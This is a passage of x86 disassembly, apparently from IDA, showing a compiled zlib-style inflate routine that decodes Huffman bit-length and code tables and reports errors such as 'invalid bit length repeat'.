cmp [ebp+var_14], 0Eh
jnb loc_42B836
cmp [ebp+var_1C], 0
jz short loc_42B7A7
mov [ebp+arg_8], 0
jmp short loc_42B802
; ---------------------------------------------------------------------------
loc_42B7A7: ; CODE XREF: sub_42B09D+6FF�j
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B802: ; CODE XREF: sub_42B09D+708�j
mov eax, [ebp+var_1C]
sub eax, 1
mov [ebp+var_1C], eax
mov ecx, [ebp+var_4]
xor edx, edx
mov dl, [ecx]
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_42B78E
; ---------------------------------------------------------------------------
loc_42B836: ; CODE XREF: sub_42B09D+6F5�j
mov eax, [ebp+var_C]
and eax, 3FFFh
mov [ebp+var_10], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_10]
mov [ecx+4], edx
mov eax, [ebp+var_10]
and eax, 1Fh
cmp eax, 1Dh
ja short loc_42B863
mov ecx, [ebp+var_10]
shr ecx, 5
and ecx, 1Fh
cmp ecx, 1Dh
jbe short loc_42B8D8
loc_42B863: ; CODE XREF: sub_42B09D+7B6�j
mov edx, [ebp+arg_0]
mov dword ptr [edx], 9
mov eax, [ebp+arg_4]
mov dword ptr [eax+18h], offset aTooManyLengthO ; "too many length or distance symbols"
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B8D8: ; CODE XREF: sub_42B09D+7C4�j
mov ecx, [ebp+var_10]
and ecx, 1Fh
mov edx, [ebp+var_10]
shr edx, 5
and edx, 1Fh
lea eax, [ecx+edx+102h]
mov [ebp+var_10], eax
push 4
mov ecx, [ebp+var_10]
push ecx
mov edx, [ebp+arg_4]
mov eax, [edx+28h]
push eax
mov ecx, [ebp+arg_4]
call dword ptr [ecx+20h]
add esp, 0Ch
mov edx, [ebp+arg_0]
mov [edx+0Ch], eax
mov eax, [ebp+arg_0]
cmp dword ptr [eax+0Ch], 0
jnz short loc_42B978
mov [ebp+arg_8], 0FFFFFFFCh
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42B978: ; CODE XREF: sub_42B09D+877�j
mov ecx, [ebp+var_C]
shr ecx, 0Eh
mov [ebp+var_C], ecx
mov edx, [ebp+var_14]
sub edx, 0Eh
mov [ebp+var_14], edx
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 4
loc_42B99D: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D+9FF�j
; DATA XREF: ...
mov edx, [ebp+arg_0]
mov eax, [edx+4]
shr eax, 0Ah
add eax, 4
mov ecx, [ebp+arg_0]
cmp [ecx+8], eax
jnb loc_42BAA1
loc_42B9B5: ; CODE XREF: sub_42B09D+9BD�j
cmp [ebp+var_14], 3
jnb loc_42BA5F
cmp [ebp+var_1C], 0
jz short loc_42B9CE
mov [ebp+arg_8], 0
jmp short loc_42BA29
; ---------------------------------------------------------------------------
loc_42B9CE: ; CODE XREF: sub_42B09D+926�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42BA29: ; CODE XREF: sub_42B09D+92F�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_42B9B5
; ---------------------------------------------------------------------------
loc_42BA5F: ; CODE XREF: sub_42B09D+91C�j
mov eax, [ebp+var_C]
and eax, 7
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
mov ecx, dword_434450[edx*4]
mov edx, [ebp+arg_0]
mov edx, [edx+0Ch]
mov [edx+ecx*4], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
add ecx, 1
mov edx, [ebp+arg_0]
mov [edx+8], ecx
mov eax, [ebp+var_C]
shr eax, 3
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, 3
mov [ebp+var_14], ecx
jmp loc_42B99D
; ---------------------------------------------------------------------------
loc_42BAA1: ; CODE XREF: sub_42B09D+912�j
; sub_42B09D+A36�j
mov edx, [ebp+arg_0]
cmp dword ptr [edx+8], 13h
jnb short loc_42BAD5
mov eax, [ebp+arg_0]
mov ecx, [eax+8]
mov edx, dword_434450[ecx*4]
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
mov dword ptr [ecx+edx*4], 0
mov edx, [ebp+arg_0]
mov eax, [edx+8]
add eax, 1
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
jmp short loc_42BAA1
; ---------------------------------------------------------------------------
loc_42BAD5: ; CODE XREF: sub_42B09D+A0B�j
mov edx, [ebp+arg_0]
mov dword ptr [edx+10h], 7
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
mov eax, [ebp+arg_0]
add eax, 14h
push eax
mov ecx, [ebp+arg_0]
add ecx, 10h
push ecx
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
push eax
call sub_42CD2E
add esp, 14h
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz loc_42BB9B
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_4]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+var_10]
mov [ebp+arg_8], eax
cmp [ebp+arg_8], 0FFFFFFFDh
jnz short loc_42BB40
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 9
loc_42BB40: ; CODE XREF: sub_42B09D+A98�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42BB9B: ; CODE XREF: sub_42B09D+A71�j
mov edx, [ebp+arg_0]
mov dword ptr [edx+8], 0
mov eax, [ebp+arg_0]
mov dword ptr [eax], 5
loc_42BBAE: ; CODE XREF: sub_42B09D+75�j
; sub_42B09D:loc_42BF3C�j
; DATA XREF: ...
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
mov [ebp+var_10], edx
mov eax, [ebp+var_10]
and eax, 1Fh
mov ecx, [ebp+var_10]
shr ecx, 5
and ecx, 1Fh
lea edx, [eax+ecx+102h]
mov eax, [ebp+arg_0]
cmp [eax+8], edx
jnb loc_42BF41
mov ecx, [ebp+arg_0]
mov edx, [ecx+10h]
mov [ebp+var_10], edx
loc_42BBE2: ; CODE XREF: sub_42B09D+BEA�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_10]
jnb loc_42BC8C
cmp [ebp+var_1C], 0
jz short loc_42BBFD
mov [ebp+arg_8], 0
jmp short loc_42BC58
; ---------------------------------------------------------------------------
loc_42BBFD: ; CODE XREF: sub_42B09D+B55�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42BC58: ; CODE XREF: sub_42B09D+B5E�j
mov ecx, [ebp+var_1C]
sub ecx, 1
mov [ebp+var_1C], ecx
mov edx, [ebp+var_4]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, [ebp+var_C]
or ecx, eax
mov [ebp+var_C], ecx
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
mov eax, [ebp+var_14]
add eax, 8
mov [ebp+var_14], eax
jmp loc_42BBE2
; ---------------------------------------------------------------------------
loc_42BC8C: ; CODE XREF: sub_42B09D+B4B�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_C]
and edx, dword_433308[ecx*4]
mov eax, [ebp+arg_0]
mov ecx, [eax+14h]
lea edx, [ecx+edx*8]
mov [ebp+var_34], edx
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+1]
mov [ebp+var_10], ecx
mov edx, [ebp+var_34]
mov eax, [edx+4]
mov [ebp+var_30], eax
cmp [ebp+var_30], 10h
jnb short loc_42BCF9
mov edx, [ebp+var_C]
mov ecx, [ebp+var_10]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, [ebp+var_10]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
mov eax, [ebp+arg_0]
mov ecx, [eax+0Ch]
mov eax, [ebp+var_30]
mov [ecx+edx*4], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
add edx, 1
mov eax, [ebp+arg_0]
mov [eax+8], edx
jmp loc_42BF3C
; ---------------------------------------------------------------------------
loc_42BCF9: ; CODE XREF: sub_42B09D+C20�j
cmp [ebp+var_30], 12h
jnz short loc_42BD08
mov [ebp+var_70], 7
jmp short loc_42BD11
; ---------------------------------------------------------------------------
loc_42BD08: ; CODE XREF: sub_42B09D+C60�j
mov ecx, [ebp+var_30]
sub ecx, 0Eh
mov [ebp+var_70], ecx
loc_42BD11: ; CODE XREF: sub_42B09D+C69�j
mov edx, [ebp+var_70]
mov [ebp+var_38], edx
mov eax, [ebp+var_30]
sub eax, 12h
neg eax
sbb eax, eax
and al, 0F8h
add eax, 0Bh
mov [ebp+var_3C], eax
loc_42BD29: ; CODE XREF: sub_42B09D+D36�j
mov ecx, [ebp+var_10]
add ecx, [ebp+var_38]
cmp [ebp+var_14], ecx
jnb loc_42BDD8
cmp [ebp+var_1C], 0
jz short loc_42BD47
mov [ebp+arg_8], 0
jmp short loc_42BDA2
; ---------------------------------------------------------------------------
loc_42BD47: ; CODE XREF: sub_42B09D+C9F�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42BDA2: ; CODE XREF: sub_42B09D+CA8�j
mov edx, [ebp+var_1C]
sub edx, 1
mov [ebp+var_1C], edx
mov eax, [ebp+var_4]
xor ecx, ecx
mov cl, [eax]
mov edx, ecx
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, [ebp+var_C]
or eax, edx
mov [ebp+var_C], eax
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_14]
add edx, 8
mov [ebp+var_14], edx
jmp loc_42BD29
; ---------------------------------------------------------------------------
loc_42BDD8: ; CODE XREF: sub_42B09D+C95�j
mov eax, [ebp+var_C]
mov ecx, [ebp+var_10]
shr eax, cl
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
sub ecx, [ebp+var_10]
mov [ebp+var_14], ecx
mov edx, [ebp+var_38]
mov eax, [ebp+var_C]
and eax, dword_433308[edx*4]
mov ecx, [ebp+var_3C]
add ecx, eax
mov [ebp+var_3C], ecx
mov edx, [ebp+var_C]
mov ecx, [ebp+var_38]
shr edx, cl
mov [ebp+var_C], edx
mov eax, [ebp+var_14]
sub eax, [ebp+var_38]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
mov [ebp+var_38], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_38]
add edx, [ebp+var_3C]
mov eax, [ebp+var_10]
and eax, 1Fh
mov ecx, [ebp+var_10]
shr ecx, 5
and ecx, 1Fh
lea eax, [eax+ecx+102h]
cmp edx, eax
ja short loc_42BE5B
cmp [ebp+var_30], 10h
jnz loc_42BEE7
cmp [ebp+var_38], 1
jnb loc_42BEE7
loc_42BE5B: ; CODE XREF: sub_42B09D+DA8�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+arg_4]
mov ecx, [eax+28h]
push ecx
mov edx, [ebp+arg_4]
call dword ptr [edx+24h]
add esp, 8
mov eax, [ebp+arg_0]
mov dword ptr [eax], 9
mov ecx, [ebp+arg_4]
mov dword ptr [ecx+18h], offset aInvalidBitLeng ; "invalid bit length repeat"
mov [ebp+arg_8], 0FFFFFFFDh
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42BEE7: ; CODE XREF: sub_42B09D+DAE�j
; sub_42B09D+DB8�j
cmp [ebp+var_30], 10h
jnz short loc_42BEFF
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
mov ecx, [ebp+var_38]
mov edx, [eax+ecx*4-4]
mov [ebp+var_74], edx
jmp short loc_42BF06
; ---------------------------------------------------------------------------
loc_42BEFF: ; CODE XREF: sub_42B09D+E4E�j
mov [ebp+var_74], 0
loc_42BF06: ; CODE XREF: sub_42B09D+E60�j
mov eax, [ebp+var_74]
mov [ebp+var_30], eax
loc_42BF0C: ; CODE XREF: sub_42B09D+E94�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
mov eax, [ebp+var_38]
mov ecx, [ebp+var_30]
mov [edx+eax*4], ecx
mov edx, [ebp+var_38]
add edx, 1
mov [ebp+var_38], edx
mov eax, [ebp+var_3C]
sub eax, 1
mov [ebp+var_3C], eax
cmp [ebp+var_3C], 0
jnz short loc_42BF0C
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_38]
mov [ecx+8], edx
loc_42BF3C: ; CODE XREF: sub_42B09D+C57�j
jmp loc_42BBAE
; ---------------------------------------------------------------------------
loc_42BF41: ; CODE XREF: sub_42B09D+B36�j
mov eax, [ebp+arg_0]
mov dword ptr [eax+14h], 0
mov [ebp+var_4C], 9
mov [ebp+var_40], 6
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
mov [ebp+var_10], edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+24h]
push edx
lea eax, [ebp+var_50]
push eax
lea ecx, [ebp+var_48]
push ecx
lea edx, [ebp+var_40]
push edx
lea eax, [ebp+var_4C]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+0Ch]
push edx
mov eax, [ebp+var_10]
shr eax, 5
and eax, 1Fh
add eax, 1
push eax
mov ecx, [ebp+var_10]
and ecx, 1Fh
add ecx, 101h
push ecx
call sub_42CDD6
add esp, 24h
mov [ebp+var_10], eax
mov edx, [ebp+arg_0]
mov eax, [edx+0Ch]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+28h]
push edx
mov eax, [ebp+arg_4]
call dword ptr [eax+24h]
add esp, 8
cmp [ebp+var_10], 0
jz short loc_42C036
cmp [ebp+var_10], 0FFFFFFFDh
jnz short loc_42BFD5
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 9
loc_42BFD5: ; CODE XREF: sub_42B09D+F2D�j
mov edx, [ebp+var_10]
mov [ebp+arg_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C036: ; CODE XREF: sub_42B09D+F27�j
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_48]
push edx
mov eax, [ebp+var_40]
push eax
mov ecx, [ebp+var_4C]
push ecx
call sub_42A129
add esp, 14h
mov [ebp+var_44], eax
cmp [ebp+var_44], 0
jnz short loc_42C0BD
mov [ebp+arg_8], 0FFFFFFFCh
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C0BD: ; CODE XREF: sub_42B09D+FBC�j
mov edx, [ebp+arg_0]
mov eax, [ebp+var_44]
mov [edx+4], eax
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 6
loc_42C0CF: ; CODE XREF: sub_42B09D+75�j
; DATA XREF: HLXc:0042C3E5�o
mov edx, [ebp+arg_0]
mov eax, [ebp+var_C]
mov [edx+20h], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_14]
mov [ecx+1Ch], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_1C]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
sub eax, [edx]
mov ecx, [ebp+arg_4]
mov edx, [ecx+8]
add edx, eax
mov eax, [ebp+arg_4]
mov [eax+8], edx
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
mov [ecx], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
mov [eax+34h], ecx
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42A17E
add esp, 0Ch
mov [ebp+arg_8], eax
cmp [ebp+arg_8], 1
jz short loc_42C147
mov edx, [ebp+arg_8]
push edx
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C147: ; CODE XREF: sub_42B09D+108F�j
mov [ebp+arg_8], 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
push ecx
call sub_42AED5
add esp, 8
mov edx, [ebp+arg_4]
mov eax, [edx]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
mov [ebp+var_1C], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+20h]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+1Ch]
mov [ebp+var_14], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+34h]
mov [ebp+var_8], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_8]
cmp ecx, [eax+30h]
jnb short loc_42C1A9
mov edx, [ebp+arg_0]
mov eax, [edx+30h]
sub eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_78], eax
jmp short loc_42C1B5
; ---------------------------------------------------------------------------
loc_42C1A9: ; CODE XREF: sub_42B09D+10F9�j
mov ecx, [ebp+arg_0]
mov edx, [ecx+2Ch]
sub edx, [ebp+var_8]
mov [ebp+var_78], edx
loc_42C1B5: ; CODE XREF: sub_42B09D+110A�j
mov eax, [ebp+var_78]
mov [ebp+var_18], eax
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+18h], 0
jnz short loc_42C1D2
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
jmp loc_42C3C4
; ---------------------------------------------------------------------------
loc_42C1D2: ; CODE XREF: sub_42B09D+1125�j
mov eax, [ebp+arg_0]
mov dword ptr [eax], 7
loc_42C1DB: ; CODE XREF: sub_42B09D+75�j
; DATA XREF: HLXc:0042C3E9�o
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
mov [ebp+arg_8], eax
mov eax, [ebp+arg_0]
mov ecx, [eax+34h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
cmp eax, [edx+30h]
jnb short loc_42C220
mov ecx, [ebp+arg_0]
mov edx, [ecx+30h]
sub edx, [ebp+var_8]
sub edx, 1
mov [ebp+var_7C], edx
jmp short loc_42C22C
; ---------------------------------------------------------------------------
loc_42C220: ; CODE XREF: sub_42B09D+1170�j
mov eax, [ebp+arg_0]
mov ecx, [eax+2Ch]
sub ecx, [ebp+var_8]
mov [ebp+var_7C], ecx
loc_42C22C: ; CODE XREF: sub_42B09D+1181�j
mov edx, [ebp+var_7C]
mov [ebp+var_18], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_0]
mov edx, [eax+30h]
cmp edx, [ecx+34h]
jz short loc_42C29B
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
mov [eax+20h], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_14]
mov [edx+1Ch], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_1C]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
sub ecx, [eax]
mov edx, [ebp+arg_4]
mov eax, [edx+8]
add eax, ecx
mov ecx, [ebp+arg_4]
mov [ecx+8], eax
mov edx, [ebp+arg_4]
mov eax, [ebp+var_4]
mov [edx], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov [ecx+34h], edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C29B: ; CODE XREF: sub_42B09D+11A1�j
mov eax, [ebp+arg_0]
mov dword ptr [eax], 8
loc_42C2A4: ; CODE XREF: sub_42B09D+75�j
; DATA XREF: HLXc:0042C3ED�o
mov [ebp+arg_8], 1
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+20h], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [eax+1Ch], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_4]
sub edx, [ecx]
mov eax, [ebp+arg_4]
mov ecx, [eax+8]
add ecx, edx
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_8]
mov [edx+34h], eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_429F50
add esp, 0Ch
jmp loc_42C3C9
; ---------------------------------------------------------------------------
loc_42C306: ; CODE XREF: sub_42B09D+75�j
; DATA XREF: HLXc:0042C3F1�o
mov [ebp+arg_8], 0FFFFFFFDh
mov ecx, [ebp+arg_0]
